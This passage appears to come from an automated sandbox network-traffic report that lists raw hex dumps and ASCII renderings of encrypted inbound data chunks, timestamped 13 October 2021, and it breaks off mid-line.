ad 2a ee 2c cb 91 a8 d4 8a 75 29 10 ed 64 9e cf c1 08 f4 93 71 ae ed aa Data Ascii: HBc[WoYfY[Cl4\FobKr?gPjs%HEQG+H6tuihDB6mKv"m4QtX')^x/)U4MlaIL9D~]T9%i-Lt=2(#B%}.##x4u:@*,u)dq
2021-10-13 13:51:48 UTC	303	IN	Data Raw: 72 74 2c 46 e6 89 71 e0 19 52 49 9c 92 a1 a6 1e 9b f3 8a eb 3c b6 49 c9 93 7f 7f 31 ab 7f 75 47 f7 6f fb 58 1d f0 f1 e7 bc 1f aa 79 f1 be 8a 51 1b 46 19 cb a2 44 34 44 bb 57 52 60 ee 8c b7 31 80 59 fa b5 7f af df fd 82 e3 e6 fc a7 4e d9 21 a5 ce 12 78 e3 89 e6 27 89 26 fe 09 da d9 bc 54 b9 6e ac 99 1d c3 5b 01 54 66 b9 77 68 b8 51 03 00 0a 08 2a e7 68 47 2e ee 2b b0 c0 4e 2a eb 5f 52 be 22 a1 78 d6 3d 09 d2 44 99 18 82 38 01 91 f7 3e 8e db 75 e5 d0 7a 85 15 73 41 dc 61 ad ed d2 f9 23 02 1f 67 4c f7 9b c0 96 1f 3e e3 00 17 59 cd 59 12 cf e6 d7 4c b4 df 4d f9 ba 28 40 91 d2 47 74 f3 52 01 a3 ea f7 87 d1 6c fb c7 e8 41 37 8e 38 8a f4 f6 47 e8 a9 48 32 94 0d df 13 86 b7 72 44 55 e5 86 6c 68 22 bf c5 0c 3f 19 f4 63 89 c5 eb 8e a9 1f 21 12 88 4d b3 8d d7 69 42 Data Ascii: rt,FqRI<I1uGoXyQFD4DWR`1YN!x'&Tn[TfwhQhG.+N_R"x=D8>uzsAa#gL>YYLM(@GtRlA78GH2rDUlh"?c!MiB
2021-10-13 13:51:48 UTC	304	IN	Data Raw: 35 d4 be 84 d3 31 7e 66 b4 8a bf 5b fb 2e dd a0 6d 99 fd db 43 47 82 cc 11 0e 80 0d b2 ec 8d c0 7b 22 17 97 39 6a 28 31 a5 54 01 4f e6 c5 95 c3 77 5a 86 e7 f2 f1 eb 27 4f c5 72 2e 9e aa cd 38 4f b1 fa 5e b5 0f b0 57 77 03 c9 79 11 f8 06 91 ad 8a e9 70 f7 e9 03 1b 44 97 a9 a6 61 fa 7c 99 28 a6 31 9e b9 b9 dc b2 b3 d2 4d 71 3d 98 ed 7e f9 d4 bb ef f5 68 85 4b c5 c5 39 0c cb f5 63 59 e1 ff 1a 7a 0e bf 9a 41 27 17 83 db 94 b2 a9 32 db 1e 04 d7 2e 4b ec b3 5c a7 5c 08 ae 74 6e 85 90 b2 c3 7d 60 2b 8d 13 35 05 28 74 2b 90 db 27 b3 5a f5 2c 57 1c e1 86 67 c0 cc c4 54 c0 f8 18 6f 22 99 e8 e1 f2 b0 78 ca 16 0e 21 09 55 55 f4 ac 35 f1 0e 3d 18 49 7b af 3d fd 54 8e fa a2 6a 42 32 8b ca 3a ab dc 22 b5 ed 95 69 b7 b3 68 2b af f3 a2 13 fd 3d 21 a4 a6 62 28 45 ee 4e da Data Ascii: 51~f[.mCG{"9j(1TOwZ'Or.8O^WwypDa\|(1Mq=~hK9cYzA'2.K\\tn}`+5(t+'Z,WgTo"x!UU5=I{=TjB2:"ih+=!b(EN
2021-10-13 13:51:48 UTC	305	IN	Data Raw: 5f 1e c9 5a 76 d5 92 a6 80 81 8d 0c 61 1a 43 0c d5 e6 af 8e 1a 79 64 c9 dc ec de 8a 07 1e 67 2a 5f 68 66 c5 79 91 7a 1a 90 93 b5 b7 35 65 cf ea 7d 38 bf 7e f3 df cb 90 d6 72 0f 98 c2 4e 57 14 35 86 8f 27 71 10 3c 8e 28 3b 04 71 04 09 af 41 68 89 7c 33 f3 51 84 b0 71 f0 6f d8 34 c8 d9 48 ae c6 87 c9 7f ed d4 8b 76 53 25 b5 62 75 98 4f 71 f6 7f c4 14 90 39 3c 24 c3 e0 92 46 27 f3 ab 5b df 77 2e f1 1e e6 7e c5 1c 25 72 50 8b ad 5c 0e 64 64 e0 c4 7a 0b bd c7 4d 89 f1 b4 d5 51 8f a5 84 d1 76 cf b3 32 5a 09 26 f0 10 9f 35 e3 bf fa e5 23 bd c3 72 f1 b7 d2 96 b5 5f 72 19 40 f0 dd 79 88 b6 2e 3b bf 7a 44 56 ce 7b ca b8 de 30 a2 e9 68 ab 1f 76 bb 67 ce 67 72 e4 06 f1 90 7a eb 2c 7c 0c 1b df d2 5b 13 22 f1 a6 31 ba 6d b3 66 24 4a 66 03 a2 d6 c4 93 49 07 22 5f 90 3e Data Ascii: _ZvaCydg*_hfyz5e}8~rNW5'q<(;qAh\|3Qqo4HvS%buOq9<$F'[w.~%rP\ddzMQv2Z&5#r_r@y.;zDV{0hvggrz,\|["1mf$JfI"_>
2021-10-13 13:51:48 UTC	306	IN	Data Raw: 13 06 48 54 0f 92 6d 30 da bf c4 a4 55 f3 3d a5 bf 13 35 93 40 0a ec 60 1d d2 9d a4 db 3f 33 f4 b9 ab d0 f8 0a ca 13 d7 65 3a 5e 6b c8 1c 20 80 f4 5f ce bb be c9 7e 7f 44 6a 1e 72 3a 56 28 32 f5 fd 25 1d 1e c0 41 8b 21 a1 80 83 07 3b 03 12 62 cc 64 fa 89 d3 5b 3e 7c c9 b6 72 83 ef ac d0 7c 84 18 b2 6a 52 0c 4c f4 c6 5f 69 7b 67 a8 68 58 58 27 73 6b 11 4b 92 6b ba 45 25 60 55 ed c5 48 34 dd d7 db e1 f0 eb 65 fd c0 6a 33 05 66 55 1f ee dd 76 ad 2e c2 63 e5 66 f1 6e bd 24 1b ed 09 08 11 5a 12 c6 1e 88 4d e4 74 8e 92 1b 5f 89 3c 12 e2 fa 23 f0 a2 2e 0d c5 d1 da 94 a4 40 4b b1 0c 60 1a 85 62 c6 0d 2b 80 e7 0f 16 7b 33 fc 85 64 db ef 07 4e b0 bc a8 fd 44 f1 bd bd bc 29 9e f7 9f 13 aa 92 97 f5 b0 d9 85 6f 06 ef b6 e8 25 b4 2b 1f 2d 59 85 88 cc bd 03 db 12 51 c2 Data Ascii: HTm0U=5@`?3e:^k _~Djr:V(2%A!;bd[>\|r\|jRL_i{ghXX'skKkE%`UH4ej3fUv.cfn$ZMt_<#.@K`b+{3dND)o%+-YQ
2021-10-13 13:51:48 UTC	307	IN	Data Raw: 76 cf c2 b8 9b 21 19 c8 85 f6 f8 8e 9e 97 5f 37 5a 29 d7 10 39 6f de 59 06 4c 9c cd 97 52 7f 10 e0 9b 57 12 a7 fd 0d 32 0e a6 a3 f1 f3 fa 64 2a 8c 39 6a 42 e9 6f 2a f8 f1 74 e5 66 7d e2 4a c3 51 06 ed 65 a5 69 0d 3d c3 13 e9 00 1b 11 df 1d bc 94 d3 c8 bd bc 39 a8 13 a1 2f 03 31 de ef 18 c3 25 ac e9 d2 9c e8 be 69 1d 15 c5 f7 f7 34 d5 61 07 a8 2c 29 71 97 38 11 7d d7 47 37 fc df 32 ee 52 aa c8 55 54 15 41 48 f6 0f 8c da 3f 62 a9 19 df a9 ee 2c 34 bf df ea e3 f1 4a b1 dd bc 84 25 32 7d b3 86 2a d7 b5 4f c5 cb 33 31 70 39 44 2e bd fa 37 1b b3 71 7b ee fb a2 cc 1f c9 38 43 a5 d6 d0 e6 72 3d 45 9d 50 29 2d ab 6c 21 4a df cb a3 9f 75 3f ec 32 b2 b7 1d 2e c5 5c 92 e4 73 3f b6 b7 40 ed 1c ef 2b 89 d1 9f 97 46 f2 bb 79 cc 82 c5 d2 98 c9 c2 ba a9 a0 fd fa 8d 7d 64 Data Ascii: v!_7Z)9oYLRW2d9jBotf}JQei=9/1%i4a,)q8}G72RUTAH?b,4J%2}*O31p9D.7q{8Cr=EP)-l!Ju?2.\s?@+Fy}d
2021-10-13 13:51:48 UTC	309	IN	Data Raw: eb b4 ca de 5a 25 10 56 ac a6 7e 44 81 01 3a 51 fb 8f 3f 5c 23 af b7 6f 7a f3 44 6d 6b 53 a3 89 97 97 bc c4 00 8a 7c e6 9c 84 92 87 ef c8 c4 df 45 cc 5b 58 cf 96 ce cc 9d 42 ad 5c e3 45 90 88 83 6d 70 5b c3 53 56 93 18 8d 91 a8 c2 66 cb 92 32 00 ae e7 c8 0a 4a 24 ab 68 d6 32 31 99 aa 10 37 fd 01 d6 23 dd f1 43 16 b2 ff 3f 74 e2 cc 48 53 48 dd 42 f0 be bb 6b a6 6d 93 39 93 76 ec bd 90 9e d0 08 e4 0f 2a 28 35 8e e0 a6 ae 57 be 39 66 92 20 dd 8a 47 c3 12 cf fd 48 b1 d8 bf 7c 8d 87 b5 44 10 a1 2c f2 16 80 a8 fd 9e d8 35 4b 52 04 7c eb 91 dc 9d 76 22 e8 7c 41 4f b3 2f 1b 29 92 23 a1 33 3b 77 52 88 3c 26 d7 b4 ec b3 cb ba 2e fa 82 bd 16 51 e6 43 ee df 04 94 bc 92 11 ce 53 74 ee dc 43 9a ae a9 39 14 f7 0d 44 ac 3e 75 0e b1 1a 41 af ed 59 7e 95 6f 36 5d 85 f0 c1 Data Ascii: Z%V~D:Q?\#ozDmkS\|E[XB\Emp[SVf2J$h217#C?tHSHBkm9v*(5W9f GH\|D,5KR\|v"\|AO/)#3;wR<&.QCStC9D>uAY~o6]
2021-10-13 13:51:48 UTC	310	IN	Data Raw: c9 aa e9 f6 9b da 8d 5b fa 33 ec 42 60 f5 5b e1 7b 0e 12 47 18 3b a0 26 75 32 bb a0 95 fa b2 a8 88 e8 79 fc e0 a3 a2 23 ab e4 4b a1 5c 98 de 7c e0 e0 a0 d5 7a 4b 83 33 a0 2d cf 36 41 e0 80 3f 9a 9e b8 9e 5a 5f 2c 20 65 06 de a0 35 19 92 a3 5a e7 da ff 40 7d 12 28 87 4c 07 9e 76 0c b1 b8 2e f7 1b 17 cf 2e f7 b1 7d a7 51 00 23 29 e3 3a 13 e8 58 2a 95 ce 77 bc a0 01 69 a9 53 ca 97 08 26 51 1d 77 da 2e 6c 42 38 15 41 c9 3e 5c d4 f1 04 86 98 e0 a4 7c 52 16 d0 23 ce c9 7d 0e 07 b5 ce 66 7f 8d bc ac c0 92 29 9a 1c 43 09 5c 10 75 0f dc 86 ed 14 f0 2f 43 86 a9 6c 24 bd a2 cb f7 b8 12 6d c4 29 5d 02 eb 5b fb 5d 1e a6 57 a3 b5 8c 93 b6 2b 85 6e ba ee 16 71 dd a6 2d 62 33 8d 3f 29 90 f3 b7 29 41 64 1d 1d ce a3 8f 7e 9b 0c 70 e0 bb ea f0 56 a7 85 09 4b ac 20 14 2f c4 Data Ascii: [3B`[{G;&u2y#K\\|zK3-6A?Z_, e5Z@}(Lv..}Q#):X*wiS&Qw.lB8A>\\|R#}f)C\u/Cl$m)][]W+nq-b3?))Ad~pVK /
2021-10-13 13:51:48 UTC	311	IN	Data Raw: eb 07 f8 4f c6 c1 13 c5 65 a3 68 fc 77 84 29 e0 00 5b 2e e2 4b 7a 1d a7 a0 00 28 e1 7a f7 fe 2c 6d 21 2c e1 a9 90 fc 79 ca 62 bc 1b 4f 77 5f a2 19 39 f7 1f c8 a5 b9 82 9c 83 b3 a6 5e 40 b4 0d b3 61 3e 88 8f 49 d9 19 5a 49 ac 10 84 b4 7c eb 1d 20 4a 45 80 74 e1 09 e9 8d c3 84 63 d6 bb 44 b5 61 0e 4b 21 da 72 05 36 fd dc 09 1b 12 06 bf 5d a2 35 aa a9 2c c3 54 2d cc 6f 75 15 5a dd dc 54 d3 56 5e f3 a8 bc d6 ee 7c a2 14 60 73 4d 25 2d 44 5f ef 7e 99 0c dd 6a a0 e4 b3 f3 04 ae 8b ba d3 9a 49 00 5c 65 54 03 02 7a 76 a2 4e df 66 9f 6b c8 7e 86 8b 06 2f 6e bc b1 2b f1 e4 d6 5b 2f a7 32 bd 6c f6 51 6e 1a f4 24 d5 0b 87 25 19 1b 5e b4 1a e0 83 13 8a 7c 30 44 d0 fa 7d d9 85 32 5b 31 78 88 27 12 07 3a 36 45 8f 4f 14 79 78 57 22 e6 9f 74 e8 32 5d e3 db f2 0f 77 de 7f Data Ascii: Oehw)[.Kz(z,m!,ybOw_9^@a>IZI\| JEtcDaK!r6]5,T-ouZTV^\|`sM%-D_~jI\eTzvNfk~/n+[/2lQn$%^\|0D}2[1x':6EOyxW"t2]w
2021-10-13 13:51:48 UTC	312	IN	Data Raw: e4 8f 90 82 d5 51 37 25 e5 31 af fa 3b b7 d7 42 aa 94 a6 39 ed 85 67 21 b5 96 a9 36 90 12 05 85 e2 75 a1 4f bf f8 f6 e9 15 b3 00 6a 49 75 b7 08 63 17 bd 12 9a df 82 8c 63 fd b6 f4 26 de a8 28 76 33 04 56 5f 8a e5 6d a9 7f d3 51 2f c5 e4 22 95 5f 1e 41 ac ce 51 71 ed fc 11 65 52 0e 56 5f cd 12 bf 34 f4 08 62 59 62 07 69 f1 69 0c 2c 3e ee 45 f5 df 1e 2a d4 3c 17 30 bd 80 5a 10 c0 fe 25 3d 7a b6 85 f3 4f 5e 6d e9 42 9d 7f 02 7c 85 9a b9 f8 8b 8d 44 24 02 2c d5 9b ea 45 35 98 9c f6 d9 f0 cc 00 6e d5 31 41 66 d1 2b 32 1a 62 fc 78 12 24 52 dc 3b 03 cf f2 e0 cf fe 0a 47 fd a1 58 36 0e da 52 72 6d 7a 10 c6 fb 57 1c 66 21 8c d0 87 fb be 2e 6b 37 f3 e0 03 c6 2e 5f 8d cc f3 1f ad 71 2a 90 a1 9c 02 f8 d7 46 67 a9 fa ff 51 a2 62 8c a0 3e ba 24 28 6f d4 4d 33 09 54 d4 Data Ascii: Q7%1;B9g!6uOjIucc&(v3V_mQ/"_AQqeRV_4bYbii,>E<0Z%=zO^mB\|D$,E5n1Af+2bx$R;GX6RrmzWf!.k7._qFgQb>$(oM3T
2021-10-13 13:51:48 UTC	314	IN	Data Raw: 45 37 41 5e 7f f8 2a 20 ee 62 44 bc 60 fe 03 95 f6 a9 93 40 ec bb 13 ce fe a8 51 3e 2f fb 6e 47 52 0f b1 6b 69 49 dd 87 5d cc f4 e2 ab 94 6b 18 28 7b 4a d9 04 f1 f4 55 ff 17 87 65 32 e8 bb 3c 8c f6 b0 bd 54 44 3f d0 e7 f1 53 cc 41 c7 0b 9b c5 81 1c 25 82 0e 16 fe 32 04 28 0a a9 01 79 50 f7 a1 cf 5c 37 61 6a d4 a7 06 71 66 f8 da b5 67 28 cb 03 79 7e c5 d3 2a ba 8d ec 27 e1 9e ff bc b8 79 09 85 fe 2e e6 ad 92 8e c2 e2 c0 71 16 75 28 3c 7a de 91 6e ca 46 f8 f7 39 30 c5 06 ab 87 2b 3e ae 07 cb ff e7 84 fd e5 50 59 d4 86 57 a6 43 79 20 ec ab 8c 01 ef 0a 05 82 03 4c 78 1d 2c b7 ee dd 62 48 90 be fd dd 85 dc e2 6c 29 0e 85 ad fb 0d 93 85 b1 a7 29 3b e1 2e e7 3c a7 93 c7 33 ad 70 13 cf eb cd 91 b9 2c 4b d6 e9 57 f1 12 4d 50 e3 29 2a 89 59 b0 0b bc cc 46 6b 8e d0 Data Ascii: E7A^* bD`@Q>/nGRkiI]k({JUe2<TD?SA%2(yP\7ajqfg(y~'y.qu(<znF90+>PYWCy Lx,bHl));.<3p,KWMP)YFk
2021-10-13 13:51:48 UTC	315	IN	Data Raw: b7 9d e3 4f af 8e f9 20 cf da 53 f4 8a c4 6b 78 9d bc 7e 38 dd ae c1 a8 21 6f 68 d7 5d 7e 82 c1 ce 94 b6 60 b2 9c 83 c0 0d de 3b 8d 19 5d 1c f6 93 8a 10 bf d4 de 44 0d 21 01 e8 82 6e 83 88 53 3a 97 44 2e 20 f9 5a 84 32 ab 8c 41 6f c0 1b a6 98 c5 3f df f3 4f c0 d3 21 d5 10 61 51 6f 17 23 e1 13 90 63 63 5e 40 2f ec e5 fd ab 7e c3 26 38 a4 1f 06 5b d9 4e f4 ff 75 77 76 e5 eb 81 16 c4 2d cc 46 f2 a8 3d 68 8e 64 88 da ff 29 91 58 59 f7 88 42 b1 bc 4d 7b cc 23 23 78 c7 ea 42 66 a6 21 c2 c1 fd e5 dc 1b 2f 27 59 0c 89 b4 c7 9b 14 45 95 a5 3f 99 d5 76 81 af 38 3c 6f cf 34 22 c5 2f 28 6c f0 33 f7 19 30 b9 ae 9e 73 1b bc 2e ab 43 54 2f 9e d4 73 58 e6 71 fa b7 ea ed 8a a2 43 17 25 29 d8 9f 8f e2 41 cc 65 b2 4b a4 dc 8e bc 4a e6 09 93 cb 39 8f d7 ae 8e 16 70 94 d4 28 Data Ascii: O Skx~8!oh]~`;]D!nS:D. Z2Ao?O!aQo#cc^@/~&8[Nuwv-F=hd)XYBM{##xBf!/'YE?v8<o4"/(l30s.CT/sXqC%)AeKJ9p(
2021-10-13 13:51:48 UTC	316	IN	Data Raw: ca a9 a5 0f 29 01 b7 ee 17 e5 4f 31 47 a5 40 30 d6 c6 6b 86 df 71 cc d9 8a 7f 5d f6 dc 67 0c bd 7a 13 2d af 11 9b 02 47 4a bf 82 d3 9f bf 36 5d 2e 65 66 27 9d b6 7d d4 8b e1 40 bb 7d 32 a6 8a d4 7c 41 3c c6 8f 93 76 ba bf fd 61 b6 03 a3 16 a9 c5 58 01 07 95 26 4f 24 32 49 54 ef fb e5 55 3b 9c 7b a8 09 b3 70 87 42 cf b2 2a 61 68 61 dc d1 f0 6c 08 6b c7 09 88 a5 ca 66 ff 95 8b fd 5d ad f7 8b 2f cd 27 64 80 1b c9 12 de d6 75 fa 74 a2 0c 44 a2 a4 e2 df 48 6b 0e 72 68 0e 6a ce c0 07 e9 83 f9 be 93 6a 53 b9 e9 59 f6 70 92 71 51 f0 23 93 bd a4 cd 71 c6 d3 fa e6 c2 d5 b8 75 49 43 d6 0f 01 21 e8 79 a3 da fa 68 d4 72 67 0d d8 33 b3 d4 91 76 d6 4b 25 f2 b1 59 b3 f5 9f f1 36 f6 30 65 c0 7d 29 e2 dd 37 c3 df 1b d4 48 6a db 4e 8e 59 7c 94 36 f8 7a 11 a0 6f 72 be 36 9d Data Ascii: )O1G@0kq]gz-GJ6].ef'}@}2\|A<vaX&O$2ITU;{pB*ahalkf]/'dutDHkrhjjSYpqQ#quIC!yhrg3vK%Y60e})7HjNY\|6zor6
2021-10-13 13:51:48 UTC	318	IN	Data Raw: 42 18 91 4b 80 19 19 a9 23 65 d6 56 8f 10 a6 3b c5 a3 be ea 02 18 57 8b b3 1a fb 08 b9 fd 23 6f 5b 49 87 8d e9 5a b4 1c 0f 60 8f 24 85 5b 78 c2 5a 94 9c 6e 40 04 33 c8 61 3c 48 cf 25 13 fd 94 8a fd 13 44 2c c6 eb 97 06 00 40 2e 56 0b d3 cd 06 ee 83 32 5b 8c f3 bb 78 4c d9 87 c2 0c c2 ce 99 37 35 66 5e 1f cc aa 74 78 83 75 6a 0b d0 c8 4d e4 cd 57 f3 52 f4 92 d2 69 c0 65 76 6f 5b ea 71 ce 3a 53 7a 53 20 bd 7b eb fb 30 3e 55 85 3c d1 04 29 de 9a 8a fb 71 5e 00 d7 46 a9 34 c9 d8 79 d7 26 23 8a fc bd 62 cc f2 ee 1b de eb 5a 22 00 a6 75 6e cf bf 5f d5 14 29 ff 4a cd 62 9a c4 9b 89 1e c4 7b 04 13 4a d9 28 bd cc bf 70 c6 ee a3 25 90 80 73 81 1f 99 fd 80 93 c3 56 01 61 3d 5d e3 01 cb f2 ba 7f 18 9e f3 ee 61 22 fd 14 80 46 26 09 4e ee 7a 06 7a ad 90 58 0a 59 67 f5 Data Ascii: BK#eV;W#o[IZ`$[xZn@3a<H%D,@.V2[xL75f^txujMWRievo[q:SzS {0>U<)q^F4y&#bZ"un_)Jb{J(p%sVa=]a"F&NzzXYg
2021-10-13 13:51:48 UTC	319	IN	Data Raw: 08 c1 73 66 0f 54 ba ed 85 dd b2 ec f3 e6 e5 f6 97 e1 d0 46 a0 96 05 7b 63 ee 22 51 e0 af 0f da bd 99 bc d0 ed 7c 34 62 54 bb b3 ab 19 d0 fb e5 c7 b1 77 c8 09 0c 4c 39 16 8a df 11 5e 1f 5d a5 81 0b 7d 3c 41 80 5d 65 d7 6d 36 44 33 38 b0 9d 90 33 ee 94 cf 7c 62 1d 36 39 f9 40 b5 c1 a2 e5 96 c2 78 a7 7e e5 2c 13 68 25 23 fd ba ab 97 d2 e4 f1 41 61 9f d3 b4 d8 1d d7 76 2c 87 70 53 88 99 99 ad 56 a2 c4 32 6c fd 5e fd b4 37 b2 e1 fd 26 4b 2a d0 a1 23 d7 e9 97 c9 e5 de 56 30 75 ae 6f 7c 84 af 22 5f f5 ee fa a7 da 78 b0 6a 31 a3 8c 29 2c d9 4d 76 bd e7 24 c7 39 7b bd 09 31 6b b4 d0 86 b8 c9 a0 4a af 3f 2a 44 46 d1 c5 8d 3e 28 33 ae 44 3f 81 fc 42 5e 9a 31 c6 8a e7 6c 68 fe 2e 21 fc 8d a0 31 ce 64 5a 30 51 26 a8 4a d4 e3 ad e9 71 d4 09 cf 75 9f d3 2a c3 0a 22 1d Data Ascii: sfTF{c"Q\|4bTwL9^]}<A]em6D383\|b69@x~,h%#Aav,pSV2l^7&K#V0uo\|"_xj1),Mv$9{1kJ?DF>(3D?B^1lh.!1dZ0Q&Jqu*"
2021-10-13 13:51:48 UTC	320	IN	Data Raw: 43 7b 9f 9e b3 cb d8 78 9a 02 d8 48 9d 70 38 15 58 31 aa df db f5 89 0e 4b 5b d8 a6 fb 32 50 18 05 a2 ee 12 e9 57 89 33 c9 2c f6 25 25 80 4a 2b 0b a7 36 59 83 20 ae 75 9e 24 cc 9d 28 0d 71 a6 8f ba 82 9a 99 52 1f 44 6a 5f 38 cf ae fe 0f 37 1b b5 50 38 50 d4 a3 82 2c 18 a0 58 26 6d 1a b4 a9 6a 1d 8a 77 41 cc db f8 29 71 fe 5d c6 2f 14 0a 61 97 bd 59 ce e8 a5 bb 9f ba 64 bb ef bb 26 15 a7 5f 66 84 1f 11 fc eb 9b 2c 49 56 64 18 af 88 50 27 c0 57 18 03 0b d8 ba 95 f1 06 4a 9b 92 7e b6 0a 52 84 8a f1 ba 5d 6b a3 ac 78 1d aa 1c 54 7a c0 e0 f2 73 06 28 29 b8 a2 ef 3d ea 2d 1b 81 42 42 39 91 ca c7 2d 66 3c ab b9 f6 14 82 95 90 eb 42 0c f1 57 95 75 3f 59 68 1c f9 05 4b cd 60 aa d4 f8 7e c6 7e af c7 be 71 6d 0e 62 93 9d 2d 67 03 38 be 8c e4 7b 1d 28 6b 2a 59 8e 88 Data Ascii: C{xHp8X1K[2PW3,%%J+6Y u$(qRDj_87P8P,X&mjwA)q]/aYd&_f,IVdP'WJ~R]kxTzs()=-BB9-f<BWu?YhK`~~qmb-g8{(k*Y
2021-10-13 13:51:48 UTC	321	IN	Data Raw: f0 0a da f4 56 19 4e d4 95 42 f9 f8 52 3b 37 de 9d 05 99 12 5d 62 63 eb 73 ba f7 26 d4 60 69 5c 87 e3 9d ee ba 93 13 b0 21 f3 9b 73 ee d1 7c 7c f3 bf da e5 6d 35 bd 00 6e 45 ea b9 33 46 22 8c 36 c4 bd 7e 92 a9 d3 a2 e2 90 f8 48 bb 23 f3 dc cf 53 d0 54 d3 ac 25 23 9b 64 0c a9 d3 d9 1d c1 f2 6d f0 0d 21 06 fc f5 46 cb d6 ad b3 07 d9 c7 29 ec 69 f9 31 8e d1 76 d4 74 3c 91 bc 24 81 4e 1e 5e 96 c4 55 e8 1d 44 3d 5e 45 44 f5 b1 28 44 09 f9 59 da 10 c3 03 9c a9 50 bb 4b 2a 99 2f 48 b4 57 2a 20 41 d6 57 83 33 64 56 a6 bc 4a a4 b4 d6 3f a3 7e 02 84 78 d6 36 53 d1 8e fd 96 af 83 12 29 47 1b a1 8e 3f 87 e4 3f c3 f5 86 12 6b c0 da 6c 68 61 24 20 25 cc 7e af 0a ee 5d 82 8d 0f 03 dd 1c e6 15 73 39 23 c6 74 b4 5b 5e 53 c5 1c 10 66 8b 52 d2 bf 87 11 c3 6a 1e 10 d0 52 0a Data Ascii: VNBR;7]bcs&`i\!s\|\|m5nE3F"6~H#ST%#dm!F)i1vt<$N^UD=^ED(DYPK/HW AW3dVJ?~x6S)G??klha$ %~]s9#t[^SfRjR
2021-10-13 13:51:48 UTC	322	IN	Data Raw: e6 93 c1 f6 ce a6 5d 1c 62 9d f8 25 83 54 d5 d6 f3 99 8e e7 31 38 0c 5e 73 b1 4c f1 de 55 91 dc 71 12 d4 0a c4 bf 1f 12 6b 07 a6 4c bc e5 47 9f d4 e8 b7 b3 07 a1 7a 40 17 35 f8 27 f6 8c 69 a3 2b 71 23 f4 79 f6 d0 09 7d c8 f0 d1 5c 15 c7 2e f1 71 03 df e3 59 d2 a1 bf c0 ab 1d 20 ca dd a6 2c ab e9 ad 35 dd 2f af 00 fc 8c 26 58 71 cd da 64 c8 7c 8c 52 df 37 31 99 2e ab 7f a4 25 e1 6f 14 dc 95 33 94 c7 92 2a cc 22 aa 2b d9 93 f4 5b ec 1f 1d c9 7c 4d e2 6d 42 62 df e0 bb d7 6b db d0 e2 f3 21 3a 2d 9c c8 e6 47 dc 1d d7 28 4a a0 97 4b 39 af 94 b3 4d e9 cf c7 17 da eb d0 75 d0 64 e1 d4 18 48 1b 91 f5 aa 9b fd c4 a4 d7 5d 5f 33 b2 00 23 5b b9 18 e9 dc 0a cf 11 30 1f a1 72 05 a7 3d 61 54 58 a1 a8 d1 29 1a 11 12 c7 3e 03 47 57 72 70 71 be 6b f5 a4 ea 9c 28 19 7d 9d Data Ascii: ]b%T18^sLUqkLGz@5'i+q#y}\.qY ,5/&Xqd\|R71.%o3*"+[\|MmBbk!:-G(JK9MudH]_3#[0r=aTX)>GWrpqk(}
2021-10-13 13:51:48 UTC	323	IN	Data Raw: 04 6e da a6 c5 0f 53 35 41 39 1e da 82 9c c5 13 46 b0 2c d2 df df c5 1b 1b ce 76 82 ec 22 6d 20 31 5e 5f d3 21 30 79 9e 13 b7 48 ce 6b b5 49 6f 2c 46 4d 50 5f 01 45 b4 92 cf d2 a8 56 b6 cd 44 38 a6 bf 1b 4e 25 0e b9 de 6e 32 84 00 0d 12 69 fa 0e 46 fc 9a aa af 57 96 40 dc cf df c3 14 fb 23 b0 b2 9c 03 68 45 e4 f8 17 64 8e 87 e8 a3 30 9f 86 55 35 08 e8 ce 57 18 ad e4 04 18 a5 30 d0 45 87 24 4e 05 f6 96 04 61 f2 06 36 99 ef e3 a8 32 33 de 5f 8d 59 99 93 e9 8d 5f b1 9f 68 7a 62 71 a3 ac 76 be 04 8a e4 e0 1e f0 44 20 b6 9d 1b 94 e3 e0 a2 24 19 00 f6 91 13 10 b1 d6 eb a2 0f 59 74 86 fe 0f 12 3d e4 c3 a7 a9 1b 0d 40 59 50 29 28 d1 15 ef 95 ff 60 41 d1 cc 01 e7 b3 67 be 75 2f 25 bf b3 72 62 93 04 60 96 d7 56 51 00 da 3a ea e7 be 26 0b ab e0 1f 30 64 27 de cd 55 Data Ascii: nS5A9F,v"m 1^_!0yHkIo,FMP_EVD8N%n2iFW@#hEd0U5W0E$Na623_Y_hzbqvD $Yt=@YP)(`Agu/%rb`VQ:&0d'U
2021-10-13 13:51:48 UTC	325	IN	Data Raw: cb b5 ea 8a 5a 6e 6a 1a ae 67 32 0a 1f b9 ef 34 a9 2e f2 2e 1e 04 3f d9 04 46 aa 6b 8c 2a 46 e9 9d 7a 2f ae e2 da c4 e3 44 2a bc 3e 12 93 89 14 38 1c f6 1b 3d ca e6 24 5d f0 b6 e7 d1 42 15 8e 2a 4d e2 0a 1e 37 6e 59 9f 73 42 2a 7f 9f 44 29 7e eb 5d e4 e8 3b ae 6b ff f0 11 1e d8 30 ec 24 05 cc 8d f8 53 91 69 1c c2 37 85 44 1c 8c 0a cd da c3 e8 d7 de 84 81 30 e7 70 32 b9 ec 7a ee ba 78 38 71 6d f8 0b e7 dc 45 76 8a bf db 85 82 54 44 bb 94 d3 59 48 56 8a 87 79 fe 96 b4 d4 8a a3 fc 0a 7c c6 25 e1 d8 8a 1b ad 13 b2 99 e6 39 ac a4 61 9d b9 a7 50 86 28 a9 b1 38 0c 5a 5d d8 cc 5f 9a 3b f8 cb 2d d4 43 ce d2 d5 56 c3 e8 ef 9a c4 66 61 d7 59 55 1d 8e 11 e9 b2 39 31 e7 12 40 5f 56 b1 4f f7 32 57 ef 43 c6 5e 3d ee 4c 0a c4 a0 4a c2 db f6 70 20 af b3 88 ff 73 3d d4 db Data Ascii: Znjg24..?FkFz/D>8=$]BM7nYsBD)~];k0$Si7D0p2zx8qmEvTDYHVy\|%9aP(8Z]_;-CVfaYU91@_VO2WC^=LJp s=
2021-10-13 13:51:48 UTC	326	IN	Data Raw: c4 ca a1 3c 7d bc d4 37 9c d1 d4 99 7b 3c b1 ca be 6c e2 3e b8 2c e9 22 f3 07 db b0 c7 16 d1 21 5a 51 15 f6 99 5c 14 c8 5f bc 03 7d d2 b2 5f c7 ee 6f 5e 1b 7a 65 af d8 f8 b7 f6 82 35 90 1d 44 14 16 86 25 8e fc f1 87 aa 7a 71 0e aa ba 71 c4 da 3a a3 0b ab ad f7 4f 0d 9b 6f 0d d6 ed 10 0c 5b a6 be 87 06 76 3f c0 38 f5 e1 de 30 b0 11 68 12 e3 57 9c 37 d8 2d 21 15 b6 15 3c ec 7f 5f 48 03 cd 96 3a 28 12 32 64 b4 35 be 1d 7e 04 d4 e9 e9 24 76 9c 6e d5 5d f1 7c c2 b6 31 45 e6 13 b5 df d9 68 0d ad 96 51 e2 3a 63 d4 10 03 aa 7a 2c 80 aa b0 d8 4d 50 f6 ba ed e3 35 5c 6c 4b fb 36 0f d8 b2 a2 7f f0 bd 0d 9d 70 09 0a 7b 78 a3 f3 fb 